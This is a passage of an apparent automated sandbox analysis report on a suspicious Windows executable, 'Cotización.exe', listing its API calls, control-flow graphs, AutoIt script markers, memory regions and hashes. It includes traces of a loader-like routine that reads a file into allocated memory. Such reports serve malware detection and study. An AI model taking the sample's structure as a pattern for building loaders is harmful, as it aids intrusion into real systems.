                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                • String ID: Include$\
                • API String ID: 3173733714-3429789819
                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                Control-flow Graph

                APIs
                • _fseek.LIBCMT ref: 0045292B
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                • __fread_nolock.LIBCMT ref: 00452961
                • __fread_nolock.LIBCMT ref: 00452971
                • __fread_nolock.LIBCMT ref: 0045298A
                • __fread_nolock.LIBCMT ref: 004529A5
                • _fseek.LIBCMT ref: 004529BF
                • _malloc.LIBCMT ref: 004529CA
                • _malloc.LIBCMT ref: 004529D6
                • __fread_nolock.LIBCMT ref: 004529E7
                • _free.LIBCMT ref: 00452A17
                • _free.LIBCMT ref: 00452A20
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                • String ID:
                • API String ID: 1255752989-0
                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                • RegisterClassExW.USER32(00000030), ref: 004104ED
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                • ImageList_ReplaceIcon.COMCTL32(00C3EE88,000000FF,00000000), ref: 00410552
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                • API String ID: 2914291525-1005189915
                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                • LoadIconW.USER32(?,00000063), ref: 004103C0
                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                • RegisterClassExW.USER32(?), ref: 0041045D
                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00C3EE88,000000FF,00000000), ref: 00410552
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _malloc
                • String ID: Default
                • API String ID: 1579825452-753088835
                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2050 40f696-40f69c 2048->2050 2051 40f660-40f674 call 4150d1 2049->2051 2052 40f63e 2049->2052 2056 40f679-40f67c 2051->2056 2053 40f640 2052->2053 2055 40f642-40f650 2053->2055 2057 40f652-40f655 2055->2057 2058 40f67e-40f68c 2055->2058 2056->2045 2059 40f65b-40f65e 2057->2059 2060 425d1e-425d3e call 4150d1 call 414d04 2057->2060 2061 40f68e-40f68f 2058->2061 2062 40f69f-40f6ad 2058->2062 2059->2051 2059->2053 2072 425d43-425d5f call 414d30 2060->2072 2061->2057 2063 40f6b4-40f6c2 2062->2063 2064 40f6af-40f6b2 2062->2064 2066 425d16 2063->2066 2067 40f6c8-40f6d6 2063->2067 2064->2057 2066->2060 2069 425d05-425d0b 2067->2069 2070 40f6dc-40f6df 2067->2070 2069->2055 2073 425d11 2069->2073 2070->2057 2072->2050 2073->2066
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __fread_nolock_fseek_memmove_strcat
                • String ID: AU3!$EA06
                • API String ID: 1268643489-2658333250
                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2080 401144-40114a 2077->2080 2081 40111b-40111e 2077->2081 2078->2077 2079 401182 2078->2079 2084 40112c-401141 DefWindowProcW 2079->2084 2082 401184-40118e call 401250 2080->2082 2083 40114c-40114f 2080->2083 2081->2080 2085 401120-401126 2081->2085 2093 401193-40119a 2082->2093 2086 401151-401157 2083->2086 2087 40119d 2083->2087 2085->2084 2089 42b038-42b03f 2085->2089 2090 401219-40121f 2086->2090 2091 40115d 2086->2091 2094 4011a3-4011a9 2087->2094 2095 42afb4-42afc5 call 40f190 2087->2095 2089->2084 2092 42b045-42b059 call 401000 call 40e0c0 2089->2092 2090->2085 2098 401225-42b06d call 468b0e 2090->2098 2096 401163-401166 2091->2096 2097 42b01d-42b024 2091->2097 2092->2084 2094->2085 2101 4011af 2094->2101 2095->2093 2103 42afe9-42b018 call 40f190 call 401a50 2096->2103 2104 40116c-401172 2096->2104 2097->2084 2102 42b02a-42b033 call 4370f4 2097->2102 2098->2093 2101->2085 2108 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2101->2108 2109 4011db-401202 SetTimer RegisterWindowMessageW 2101->2109 2102->2084 2103->2084 2104->2085 2113 401174-42afde call 45fd57 2104->2113 2109->2093 2111 401204-401216 CreatePopupMenu 2109->2111 2113->2084 2127 42afe4 2113->2127 2127->2093
                APIs
                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                • PostQuitMessage.USER32(00000000), ref: 004011CB
                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                • CreatePopupMenu.USER32 ref: 00401204
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                • String ID: TaskbarCreated
                • API String ID: 129472671-2362178303
                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                APIs
                • _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • std::exception::exception.LIBCMT ref: 00411626
                • std::exception::exception.LIBCMT ref: 00411640
                • __CxxThrowException@8.LIBCMT ref: 00411651
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                • String ID: ,*H$4*H$@fI
                • API String ID: 615853336-1459471987
                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2147 406c1f0-406c29e call 4069c40 2150 406c2a5-406c2cb call 406d100 CreateFileW 2147->2150 2153 406c2d2-406c2e2 2150->2153 2154 406c2cd 2150->2154 2162 406c2e4 2153->2162 2163 406c2e9-406c303 VirtualAlloc 2153->2163 2155 406c41d-406c421 2154->2155 2156 406c463-406c466 2155->2156 2157 406c423-406c427 2155->2157 2159 406c469-406c470 2156->2159 2160 406c433-406c437 2157->2160 2161 406c429-406c42c 2157->2161 2164 406c4c5-406c4da 2159->2164 2165 406c472-406c47d 2159->2165 2166 406c447-406c44b 2160->2166 2167 406c439-406c443 2160->2167 2161->2160 2162->2155 2168 406c305 2163->2168 2169 406c30a-406c321 ReadFile 2163->2169 2174 406c4dc-406c4e7 VirtualFree 2164->2174 2175 406c4ea-406c4f2 2164->2175 2172 406c481-406c48d 2165->2172 2173 406c47f 2165->2173 2176 406c44d-406c457 2166->2176 2177 406c45b 2166->2177 2167->2166 2168->2155 2170 406c323 2169->2170 2171 406c328-406c368 VirtualAlloc 2169->2171 2170->2155 2178 406c36f-406c38a call 406d350 2171->2178 2179 406c36a 2171->2179 2180 406c4a1-406c4ad 2172->2180 2181 406c48f-406c49f 2172->2181 2173->2164 2174->2175 2176->2177 2177->2156 2187 406c395-406c39f 2178->2187 2179->2155 2184 406c4af-406c4b8 2180->2184 2185 406c4ba-406c4c0 2180->2185 2183 406c4c3 2181->2183 2183->2159 2184->2183 2185->2183 2188 406c3d2-406c3e6 call 406d160 2187->2188 2189 406c3a1-406c3d0 call 406d350 2187->2189 2195 406c3ea-406c3ee 2188->2195 2196 406c3e8 2188->2196 2189->2187 2197 406c3f0-406c3f4 CloseHandle 2195->2197 2198 406c3fa-406c3fe 2195->2198 2196->2155 2197->2198 2199 406c400-406c40b VirtualFree 2198->2199 2200 406c40e-406c417 2198->2200 2199->2200 2200->2150 2200->2155
                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0406C2C1
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0406C4E7
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                • Instruction ID: 172d03ad9d85f40bfb13a53b5694adabceb5352ab25e07b017316e4cca8e2f4f
                • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                • Instruction Fuzzy Hash: 55A12B70E04209EBEB14CFA4C894BEEB7B5FF48304F208559E546BB284D775AA81CF95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2201 4102b0-4102c5 SHGetMalloc 2202 4102cb-4102da SHGetDesktopFolder 2201->2202 2203 425dfd-425e0e call 433244 2201->2203 2204 4102e0-41031a call 412fba 2202->2204 2205 41036b-410379 2202->2205 2213 410360-410368 2204->2213 2214 41031c-410331 SHGetPathFromIDListW 2204->2214 2205->2203 2211 41037f-410384 2205->2211 2213->2205 2215 410351-41035d 2214->2215 2216 410333-41034a call 412fba 2214->2216 2215->2213 2216->2215
                APIs
                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                • _wcsncpy.LIBCMT ref: 004102ED
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                • _wcsncpy.LIBCMT ref: 00410340
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                • String ID: C:\Users\user\Desktop\Cotizaci#U00f3n.exe
                • API String ID: 3170942423-903553725
                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2222 427190-4271ae RegQueryValueExW 2219->2222 2223 40e4eb-40e4f0 2219->2223 2224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2222->2224 2225 42721a-42722a RegCloseKey 2222->2225 2230 427210-427219 call 436508 2224->2230 2231 4271f7-42720e call 402160 2224->2231 2230->2225 2231->2230
                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: QueryValue$CloseOpen
                • String ID: Include$Software\AutoIt v3\AutoIt
                • API String ID: 1586453840-614718249
                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                APIs
                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                • ShowWindow.USER32(?,00000000), ref: 004105E4
                • ShowWindow.USER32(?,00000000), ref: 004105EE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
